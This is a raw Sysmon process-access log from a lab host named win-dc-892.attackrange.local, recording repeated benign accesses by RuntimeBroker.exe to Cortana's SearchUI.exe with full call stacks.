12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
